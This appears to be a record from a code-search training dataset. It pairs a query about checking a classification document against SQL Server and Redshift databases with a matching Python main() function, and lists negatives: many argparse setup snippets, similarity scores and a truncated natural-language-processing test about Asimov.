'--no-term-title','--no-banner',\n '--autocall=0']", "def initialize_args(self):\n self.arguments = self.argumentParser.parse_args()\n\n self.plotName = self.arguments[\"plotName\"]\n self.xLabel = self.arguments[\"xLabel\"]\n self.yLabel = self.arguments[\"yLabel\"]\n\n # convert array in json format(representing color) to tuple\n\n self.plotNameColor = tuple(json.loads(self.arguments[\"plotNameColor\"]))\n self.xAxisLabelColor = tuple(json.loads(self.arguments[\"xAxisLabelColor\"]))\n self.yAxisLabelColor = tuple(json.loads(self.arguments[\"yAxisLabelColor\"]))\n self.bottomSpineColor = tuple(json.loads(self.arguments[\"bottomSpineColor\"]))\n self.topSpineColor = tuple(json.loads(self.arguments[\"topSpineColor\"]))\n self.leftSpineColor = tuple(json.loads(self.arguments[\"leftSpineColor\"]))\n self.rightSpineColor = tuple(json.loads(self.arguments[\"rightSpineColor\"]))\n\n self.xTickColor = tuple(json.loads(self.arguments[\"xTickColor\"]))\n self.yTickColor = tuple(json.loads(self.arguments[\"yTickColor\"]))\n\n # bg color\n self.figureBackgroundColor = tuple(json.loads(self.arguments[\"figureBackgroundColor\"]))\n self.axesBackgroundColor = tuple(json.loads(self.arguments[\"axesBackgroundColor\"]))\n\n #region minor locator\n self.xMinorLocatorValue=self.arguments[\"xMinorLocatorValue\"]\n self.yMinorLocatorValue = self.arguments[\"yMinorLocatorValue\"]\n #endregion", "def __init__(self, *args, **kwargs):\n Cli.__init__(self, *args, **kwargs)\n # Set common arguments\n self.add_argument(\n '--build', env_var=\"BUILD\", default='latest',\n help='Override build id, defaults to latest')\n self.add_argument(\n '--buildroot', env_var=\"BUILD_ROOT\", default='builds',\n help='Build directory')\n self.add_argument(\n '--schema', env_var=\"META_SCHEMA\",\n default='/usr/lib/coreos-assembler/v1.json',\n help='Schema to use. Set to NONE to skip all validation')", "def __add_arguments__(cls, parser):", "def full_args():\n return setup_args()", "def __init__(self, program, args):\n self.__program = program\n self.__args = args", "def __init__( self ):\n self.arguments = []\n self._opt_specs = []\n self._pos_specs = []\n self._values = {}", "def add_arguments(parser):\n parser.add_argument('-e', '--environment', help='Environment name', required=True)\n parser.add_argument('-w', '--dont-wait', help='Skip waiting for the init to finish', action='store_true')\n parser.add_argument('-l', '--version-label', help='Version label', required=False)", "def setup(self, optparser):\n\t\tpass", "def setup_options_parser(self, argparser):\n pass", "def init(args: Optional[List[bytes]] = None) -> None:\n warnings.warn(_deprecation_warning(), FutureWarning)\n parsed = {}\n if args:\n for arg in args:\n kv = arg.decode().split('=')\n if len(kv) == 2:\n parsed[kv[0]] = kv[1]\n collective.init(**parsed)", "def __init__(self):\n self._parser = argparse.ArgumentParser(description='Arguments for talking to vCenter')\n self._standard_args_group = self._parser.add_argument_group('standard arguments')\n self._specific_args_group = self._parser.add_argument_group('sample-specific arguments')\n\n # because -h is reserved for 'help' we use -s for service\n self._standard_args_group.add_argument('-s', '--host',\n required=True,\n action='store',\n help='vSphere service address to connect to')\n\n # because we want -p for password, we use -o for port\n self._standard_args_group.add_argument('-o', '--port',\n type=int,\n default=443,\n action='store',\n help='Port to connect on')\n\n self._standard_args_group.add_argument('-u', '--user',\n required=True,\n action='store',\n help='User name to use when connecting to host')\n\n self._standard_args_group.add_argument('-p', '--password',\n required=False,\n action='store',\n help='Password to use when connecting to host')\n\n self._standard_args_group.add_argument('-nossl', '--disable-ssl-verification',\n required=False,\n action='store_true',\n help='Disable ssl host certificate verification')", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"Translate XLS files to appropriate XML format for ingestion in FEDEO.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"xlsfile\", help=\"The XLS file to parse\")\n parser.add_argument('-outputdir', help=\"directory to output the XML file\", default='output')\n parser.add_argument('-j', action='store_true', help=\"Also export JSON file\")\n parser.add_argument('-p', action='store_true', help=\"Pretty print XML file\")\n parser.add_argument('-o', action='store_true', help=\"Overwrite output XML file\")\n parser.add_argument('-l', action='store_true', help=\"Skip I_G_LN as mandatory field\", default=False)\n return parser.parse_args()", "def prepare_args():\n parser = argparse.ArgumentParser(description='Args for training')\n \"\"\"Optional arguments for pre-split train/test files\n parser.add_argument('--train_file', type=str, default='data/train.npy')\n parser.add_argument('--test_file', type=str, default='data/test.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/train_labels.npy')\n \"\"\"\n parser.add_argument('--dataset_file', type=str, default='data/dev.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/dev_labels.npy')\n parser.add_argument('--context', type=int, default=1)\n parser.add_argument('--batch_size', type=int, default=8)\n parser.add_argument('--optimizer', type=str, default='SGD')\n parser.add_argument('--model_name', type=str, default='SimpleNet')\n parser.add_argument('--lr', type=float, default=3e-4)\n parser.add_argument('--wd', type=float, default=0)\n parser.add_argument('--num_epochs', type=int, default=1000)\n parser.add_argument('--shuffle', action='store_true')\n args_to_ret = parser.parse_args()\n return args_to_ret", "def add_args(self): \n self.parser.add_argument('-u', '--username',\n default=None,\n help='the username for mongoDB (Default: None)')\n\n self.parser.add_argument('-p', '--password',\n default=None,\n help='the password for mongoDB (Default: None)')\n\n self.parser.add_argument('-d', '--database',\n default='grits',\n help='the database for mongoDB (Default: grits)')\n\n self.parser.add_argument('-m', '--mongohost',\n default='localhost',\n help='the hostname for mongoDB (Default: localhost)')\n\n self.parser.add_argument('-f', '--force', \n action='store_true',\n help='do not require confirmation to create indexes (Default: False)')", "def _add_standard_args(parser: ArgumentParser) -> None:\r\n parser.add_argument(\r\n '--username',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_USERNAME',\r\n help='Username used to login to Zephyr Scale.'\r\n )\r\n parser.add_argument(\r\n '--password',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_PASSWORD',\r\n help='Password used to login to Zephyr Scale.'\r\n )\r\n parser.add_argument(\r\n '--url',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_URL',\r\n help='Jira url used to interace with the Zephyr API.'\r\n )\r\n parser.set_defaults(cmd=FolderCommand(parser))", "def init(arg):\n arg.add_argument('-ls', '--list', help='List functions: Takes \"all\", \"partialName*\", \"exactName\"', type=str)\n arg.add_argument('-f', '--func', help='Function to call', type=str)\n arg.add_argument('-a', '--args', help='Argument list for the function', action='append', type=str)\n arg.add_argument('-kw', '--kwargs', help='Keyword arg list, like \"-kw k=b\" or \"-kw k=JSON\"', action='append', type=str)\n arg.add_argument('-q', help='Quiet, use if calling from a script', action='store_true')\n arg.add_argument('-?', dest=\"helpme\", help='Print help for function', action='store_true')\n arg.add_argument('--printResult', help='Print the return value, format if needed', choices=['str', 'json'], type=str, default=None)", "def configure_args():\r\n \r\n parser = ArgumentParser(description='Runs an MDP instance with the Value Iteration algorithm.')\r\n parser.add_argument(\"-problem\", type=str, help = \"Problem file\")\r\n parser.add_argument(\"-error\", type=float, help = \"Error tolerance\")\r\n\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.problem):\r\n print \"The file described in the 'problem' parameter does not exist or is not a valid file.\"\r\n sys.exit(-1)\r\n\r\n if not (0 < args.error < 1):\r\n print \"The 'error' parameter must be between 0 (zero) and 1 (one).\"\r\n sys.exit(-1)\r\n \r\n return args", "def __init__(self, params_dict):\n\n self._params = []\n \"\"\"\n Initialized by the command line parser with all positional parameters\n supplied on the command line\n \"\"\"\n\n if not params_dict:\n return\n self._param_text = params_dict.get(\"params\")\n self._help_text = params_dict.get(\"text\")", "def setup_cmdline():\n config_file = Script.fullname + '.ini'\n if modUtils.linux():\n log_folder = '/var/log'\n elif modUtils.windows():\n log_folder = 'c:/Temp'\n else:\n log_folder = '.'\n\n parser = argparse.ArgumentParser(\n description='Cooling fan manager and MQTT client, version '\n + __version__\n )\n # Position arguments\n parser.add_argument(\n 'config',\n type=argparse.FileType('r'),\n nargs='?',\n default=config_file,\n help='Configuration INI file, default: ' + config_file\n )\n # Options\n parser.add_argument(\n '-V', '--version',\n action='version',\n version=__version__,\n help='Current version of the script.'\n )\n parser.add_argument(\n '-v', '--verbose',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n default='debug',\n help='Level of logging to the console.'\n )\n parser.add_argument(\n '-l', '--loglevel',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n default='debug',\n help='Level of logging to a log file.'\n )\n parser.add_argument(\n '-d', '--logdir',\n default=log_folder,\n help='Folder of a log file, default ' + log_folder\n )\n parser.add_argument(\n '-c', '--configuration',\n action='store_true',\n help=\"\"\"Print configuration parameters in form of INI file content.\"\"\"\n )\n # Process command line arguments\n global cmdline\n cmdline = parser.parse_args()", "def __init__(self, args=False):\n self.args = args", "def setup_argparse():\n parser = argparse.ArgumentParser(\n description=_('A simple tool for basic configuration of Speech Dispatcher and problem diagnostics'))\n parser.add_argument('-u', '--create-user-conf',\n dest='create_user_configuration', action=\"store_true\", default=False,\n help=_(\"Create Speech Dispatcher configuration for the given user\"))\n parser.add_argument('-c', '--config-basic-settings-user',\n dest='config_basic_settings_user', action=\"store_true\", default=False,\n help=_(\"Configure basic settings in user configuration\"))\n parser.add_argument('-C', '--config-basic-settings-system',\n dest='config_basic_settings_system', action=\"store_true\", default=False,\n help=_(\"Configure basic settings in system-wide configuration\"))\n parser.add_argument('-d', '--diagnostics', dest='diagnostics',\n action=\"store_true\", default=False,\n help=_(\"Diagnose problems with the current setup\"))\n parser.add_argument('-s', '--test-spd-say', dest='test_spd_say',\n action=\"store_true\", default=False,\n help=_(\"Test connection to Speech Dispatcher using spd-say\"))\n parser.add_argument('--test-festival', dest='test_festival',\n action=\"store_true\", default=False,\n help=_(\"Test whether Festival works as a server\"))\n parser.add_argument('--test-espeak', dest='test_espeak', action=\"store_true\",\n default=False, help=_(\"Test whether Espeak works as a standalone binary\"))\n parser.add_argument('--test-alsa', dest='test_alsa', action=\"store_true\",\n default=False, help=_(\"Test ALSA audio output\"))\n parser.add_argument('--test-pulse', dest='test_pulse', action=\"store_true\",\n default=False, help=_(\"Test Pulse Audio output\"))\n parser.add_argument('-e', '--espeak', dest='use_espeak_synthesis',\n action=\"store_true\", default=use_espeak_synthesis,\n help=_(\"Use espeak to synthesize messages\"))\n parser.add_argument('-n', '--dont-ask', dest='dont_ask',\n action=\"store_true\", default=False,\n help=_(\"Do not ask any questions, always use default values\"))\n parser.add_argument('-D', '--debug', dest='debug',\n action=\"store_true\", default=False,\n help=_(\"Debug a problem and generate a report\"))\n parser.add_argument('--version', dest='version',\n action=\"store_true\",\n help=_(\"Print version and copyright info\"))\n return parser", "def _set_arguments(self):\n cert_location = f\"dependencies{sep}certificates{sep}localuser.crt\"\n key_location = f\"dependencies{sep}certificates{sep}localuser.key\"\n assert Path(cert_location).exists(), (\n f\"The certificate isn't \"\n f\"present at location {Path(cert_location).absolute()}\"\n )\n assert Path(key_location).exists(), (\n f\"The certificate key isn't \"\n f\"present at location {Path(key_location).absolute()}\"\n )\n self._arguments = [\n (\n \"test-certificate-verify\",\n [\"-k\", key_location, \"-c\", cert_location],\n ),\n (\n \"test-sig-algs\",\n [],\n ),\n (\n \"test-clienthello-md5\",\n [],\n ),\n (\n \"test-tls13-pkcs-signature\",\n [],\n ),\n ]", "def __init__(self, args):\n super().__init__()\n self.args = args", "def test_arg_parser_default_values(self):\n\n parsed_args = self.parser.parse_args([])\n self.assertIsNone(parsed_args.command)\n self.assertFalse(parsed_args.debug)\n self.assertEqual(parsed_args.formatter, 'table')", "def get_args():\n parser = argparse.ArgumentParser(\n description=\"Sets up package within the pheeno's directory.\"\n )\n\n # Required arguments\n parser.add_argument(\"-x\", \"--execute\", action=\"execute\", required=True,\n help=\"something\", default=False)\n\n # Optional arguments\n parser.add_argument(\"-s\", \"--save\", action=\"store\", required=False,\n help=\"something\", default=False)", "def setUp(self):\n setup_testenv()\n self.args = DEFAULT_CLI_ARGS\n self.args['--output'] = ['png']", "def setup_args(**kargs):\n args = [get_nupack_exec_path(kargs['exec_name']),\n '-material', kargs['material'], '-sodium', kargs['sodium'],\n '-magnesium', kargs['magnesium'], '-dangles', kargs['dangles'], '-T', kargs['T']]\n if kargs['multi']: args += ['-multi']\n if kargs['pseudo']: args += ['-pseudo']\n return args", "def main(self):\n self.declare_opts()\n options = vars(self.parser.parse_args())\n # Set log file to os.devnull in daemon mode to avoid logging to\n # std(out|err).\n # TODO: Probably useless. To be checked\n #if options.__dict__.get('daemon', False) and \\\n # not options.__dict__.get('logfile', False):\n # options.__dict__['logfile'] = devnull\n self.options.update(options)\n clean_dict(self.options)", "def __init__(self, name, progname):\n self.name = name\n self.progname = progname\n self.progargs = \"\"", "def setup_args(self):\n self.parser = argparse.ArgumentParser()\n self.group = self.parser.add_mutually_exclusive_group()\n\n self.group.add_argument('-a', '--add', help='Adds a new task to the task list', action='store_true')\n self.group.add_argument('-r', '--remove', help='Removes a task from the task list', action='store_true')\n self.group.add_argument('-f', '--finish', help='Sets a task to be finished', action='store_true')\n self.group.add_argument('-u', '--unfinish', help='Sets a task to be not finished', action='store_true')\n self.group.add_argument('-c', '--change', help='Updates an existing task', action='store_true')\n self.group.add_argument('-v', '--view', help='View your current task list', action='store_true')\n\n return self.parser", "def main(args=None):\n pass" ]
[ "0.74415267", "0.7358454", "0.7253338", "0.72039276", "0.7177294", "0.71553427", "0.71082044", "0.70940363", "0.7049619", "0.6945425", "0.6943998", "0.69109726", "0.687143", "0.67964226", "0.6782141", "0.6766867", "0.67629826", "0.6739199", "0.67152214", "0.67124844", "0.6708699", "0.66687435", "0.6661174", "0.6629373", "0.65681475", "0.65629065", "0.65627867", "0.6554023", "0.65423876", "0.65423876", "0.65392756", "0.65392756", "0.65384805", "0.6533841", "0.6511449", "0.64848757", "0.64782375", "0.64684933", "0.64615566", "0.6461278", "0.6444898", "0.64409226", "0.6440259", "0.6434877", "0.64274734", "0.6423676", "0.6421975", "0.64196336", "0.64162767", "0.6415422", "0.63788164", "0.6370277", "0.6368363", "0.6363682", "0.6362222", "0.6358678", "0.6355973", "0.6351757", "0.6346331", "0.6338244", "0.6338244", "0.6314246", "0.62998897", "0.6297704", "0.629453", "0.62927896", "0.62926334", "0.6292359", "0.6285394", "0.6280449", "0.62787384", "0.6276649", "0.62747806", "0.6272976", "0.6270616", "0.62690467", "0.6267613", "0.6262224", "0.6260897", "0.62603664", "0.6252203", "0.6250976", "0.62439865", "0.62421113", "0.6241558", "0.6234495", "0.62335116", "0.62224334", "0.6216719", "0.62071663", "0.62002504", "0.62000394", "0.61868507", "0.6184209", "0.6183812", "0.6172311", "0.61708915", "0.61645955", "0.61618257", "0.61516225" ]
0.6216561
89
This program tests that the classification document, the Sql Server DB and Redshift DB all agree with each other
def main(): args, dummy_l_log_filename_s = initialise() # -- Initialise if not alib.init_app(args): return alib.FAIL_GENERIC work_dir = alib.load_dir(args) print('Loading files from {}'.format(work_dir['l_c_dir'])) work_files = alib.load_files(work_dir, args['quick_debug']) # work_dict = alib.load_matching_masterfile(work_files) # alib.load_tags(work_dict) # alib.print_filenames(work_dict) validate_hidden(work_files) alib.p_i('Done...')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_snippet_1(self):\n\n text = \"Asimov also wrote mysteries and fantasy, as well as much nonfiction. Most of his popular science books explain concepts in a historical way, going as far back as possible to a time when the science in question was at its simplest stage. Examples include Guide to Science, the three-volume set Understanding Physics, and Asimov's Chronology of Science and Discovery. He wrote on numerous other scientific and non-scientific topics, such as chemistry, astronomy, mathematics, history, biblical exegesis, and literary criticism.\"\n drs = Drs.create_from_natural_language(text)\n expected_drs = Drs.create_from_predicates_string(\"\"\"\n {'word': 'wrote', 'tag': 'v', 'compound': 'wrote', 'entity': '', 'lemma': 'write', 'gender_guess': None,\n 'is_head_token': True, 'refers_to': None, 'negated': 'false', 'type': None}(v2),\n {'word': 'Asimov', 'tag': 'n', 'compound': 'Asimov', 'entity': 'PERSON', 'lemma': 'Asimov',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v0),\n {'word': 'also', 'tag': 'RB', 'compound': 'also', 'entity': '', 'lemma': 'also', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v1),\n {'word': 'mysteries', 'tag': 'n', 'compound': 'mysteries', 'entity': '', 'lemma': 'mystery',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v3),\n {'word': 'fantasy', 'tag': 'n', 'compound': 'fantasy', 'entity': '', 'lemma': 'fantasy',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v5),\n {'word': 'nonfiction', 'tag': 'n', 'compound': 'nonfiction', 'entity': '', 'lemma': 'nonfiction',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v11),\n {'word': 'as', 'tag': 'RB', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v7),\n {'word': 'well', 'tag': 'RB', 'compound': 'well', 'entity': '', 'lemma': 'well', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v8),\n {'word': 'much', 'tag': 'j', 'compound': 'much', 'entity': '', 'lemma': 'much', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v10),\n {'word': 'Most', 'tag': 'j', 'compound': 'Most', 'entity': '', 'lemma': 'Most', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v13),\n {'word': 'books', 'tag': 'n', 'compound': 'books', 'entity': '', 'lemma': 'book', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v18),\n {'word': 'he', 'tag': 'PRP$', 'compound': 'he', 'entity': '', 'lemma': 'he', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v15),\n {'word': 'popular', 'tag': 'j', 'compound': 'popular', 'entity': '', 'lemma': 'popular',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v16),\n {'word': 'science', 'tag': 'n', 'compound': 'science', 'entity': '', 'lemma': 'science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v17),\n {'word': 'explain', 'tag': 'v', 'compound': 'explain', 'entity': '', 'lemma': 'explain',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v19),\n {'word': 'concepts', 'tag': 'n', 'compound': 'concepts', 'entity': '', 'lemma': 'concept',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v20),\n {'word': 'going', 'tag': 'v', 'compound': 'going', 'entity': '', 'lemma': 'go', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v26),\n {'word': 'way', 'tag': 'n', 'compound': 'way', 'entity': '', 'lemma': 'way', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v24),\n {'word': 'historical', 'tag': 'j', 'compound': 'historical', 'entity': '', 'lemma': 'historical',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v23),\n {'word': 'back', 'tag': 'RB', 'compound': 'back', 'entity': '', 'lemma': 'back', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v29),\n {'word': 'to', 'tag': 'IN', 'compound': 'to', 'entity': '', 'lemma': 'to', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'to'}(v32),\n {'word': 'far', 'tag': 'RB', 'compound': 'far', 'entity': '', 'lemma': 'far', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v28),\n {'word': 'as', 'tag': 'RB', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v27),\n {'word': 'as', 'tag': 'IN', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'as'}(v30),\n {'word': 'possible', 'tag': 'j', 'compound': 'possible', 'entity': '', 'lemma': 'possible',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v31),\n {'word': 'time', 'tag': 'n', 'compound': 'time', 'entity': '', 'lemma': 'time', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v34),\n {'word': 'was', 'tag': 'v', 'compound': 'was', 'entity': '', 'lemma': 'be', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v40),\n {'word': 'science', 'tag': 'n', 'compound': 'science', 'entity': '', 'lemma': 'science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v37),\n {'word': 'in', 'tag': 'IN', 'compound': 'in', 'entity': '', 'lemma': 'in', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'in'}(v38),\n {'word': 'question', 'tag': 'n', 'compound': 'question', 'entity': '', 'lemma': 'question',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v39),\n {'word': 'when', 'tag': 'WRB', 'compound': 'when', 'entity': '', 'lemma': 'when', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v35),\n {'word': 'at', 'tag': 'IN', 'compound': 'at', 'entity': '', 'lemma': 'at', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'at'}(v41),\n {'word': 'stage', 'tag': 'n', 'compound': 'stage', 'entity': '', 'lemma': 'stage', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v44),\n {'word': 'its', 'tag': 'PRP$', 'compound': 'its', 'entity': '', 'lemma': 'its', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v42),\n {'word': 'simplest', 'tag': 'j', 'compound': 'simplest', 'entity': '', 'lemma': 'simple',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v43),\n {'word': 'include', 'tag': 'v', 'compound': 'include', 'entity': '', 'lemma': 'include',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v47),\n {'word': 'Examples', 'tag': 'n', 'compound': 'Examples', 'entity': '', 'lemma': 'example',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v46),\n {'word': 'Guide', 'tag': 'n', 'compound': 'Guide', 'entity': '', 'lemma': 'Guide', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v48),\n {'word': '.', 'tag': '.', 'compound': '.', 'entity': '', 'lemma': '.', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v68),\n {'word': 'to', 'tag': 'IN', 'compound': 'to', 'entity': '', 'lemma': 'to', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v49),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v51),\n {'word': 'set', 'tag': 'v', 'compound': 'set', 'entity': '', 'lemma': 'set', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v56),\n {'word': 'Science', 'tag': 'n', 'compound': 'Science', 'entity': '', 'lemma': 'Science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v50),\n {'word': 'volume', 'tag': 'n', 'compound': 'volume', 'entity': '', 'lemma': 'volume', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v55),\n {'word': 'three', 'tag': 'CD', 'compound': 'three', 'entity': 'CARDINAL', 'lemma': 'three',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v53),\n {'word': '-', 'tag': 'HYPH', 'compound': '-', 'entity': '', 'lemma': '-', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v54),\n {'word': 'Physics', 'tag': 'n', 'compound': 'Understanding_Physics', 'entity': 'ORG', 'lemma': 'Physics',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v58),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v59),\n {'word': 'and', 'tag': 'CC', 'compound': 'and', 'entity': '', 'lemma': 'and', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v60),\n {'word': 'Chronology', 'tag': 'n', 'compound': 'Chronology', 'entity': 'WORK_OF_ART', 'lemma': 'Chronology',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v63),\n {'word': 'Asimov', 'tag': 'n', 'compound': 'Asimov', 'entity': 'PERSON', 'lemma': 'Asimov',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v61),\n {'word': 'of', 'tag': 'IN', 'compound': 'of', 'entity': 'WORK_OF_ART', 'lemma': 'of', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v64),\n {'word': 'Science', 'tag': 'n', 'compound': 'Science', 'entity': 'WORK_OF_ART', 'lemma': 'Science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v65),\n {'word': 'and', 'tag': 'CC', 'compound': 'and', 'entity': 'WORK_OF_ART', 'lemma': 'and',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v66),\n {'word': 'Discovery', 'tag': 'n', 'compound': 'Discovery', 'entity': 'WORK_OF_ART', 'lemma': 'Discovery',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v67),\n {'word': 'wrote', 'tag': 'v', 'compound': 'wrote', 'entity': '', 'lemma': 'write', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v70),\n {'word': 'He', 'tag': 'PRP', 'compound': 'He', 'entity': 'PERSON', 'lemma': 'he', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v69),\n {'word': 'on', 'tag': 'IN', 'compound': 'on', 'entity': '', 'lemma': 'on', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v71),\n {'word': '.', 'tag': '.', 'compound': '.', 'entity': '', 'lemma': '.', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v97),\n {'word': 'topics', 'tag': 'n', 'compound': 'topics', 'entity': '', 'lemma': 'topic', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v79),\n {'word': 'scientific', 'tag': 'j', 'compound': 'scientific', 'entity': '', 'lemma': 'scientific',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v74),\n {'word': '-', 'tag': 'j', 'compound': '-', 'entity': '', 'lemma': '-', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v77),\n {'word': 'non', 'tag': 'j', 'compound': 'non', 'entity': '', 'lemma': 'non', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v76),\n {'word': 'scientific', 'tag': 'j', 'compound': 'scientific', 'entity': '', 'lemma': 'scientific',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v78),\n {'word': 'numerous', 'tag': 'j', 'compound': 'numerous', 'entity': '', 'lemma': 'numerous',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v72),\n {'word': 'other', 'tag': 'j', 'compound': 'other', 'entity': '', 'lemma': 'other', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v73),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v80),\n {'word': 'as', 'tag': 'IN', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'as'}(v82),\n {'word': 'such', 'tag': 'j', 'compound': 'such', 'entity': '', 'lemma': 'such', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v81),\n {'word': 'chemistry', 'tag': 'n', 'compound': 'chemistry', 'entity': '', 'lemma': 'chemistry',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v83),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v84),\n {'word': 'astronomy', 'tag': 'n', 'compound': 'astronomy', 'entity': '', 'lemma': 'astronomy',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v85),\n {'word': ',', 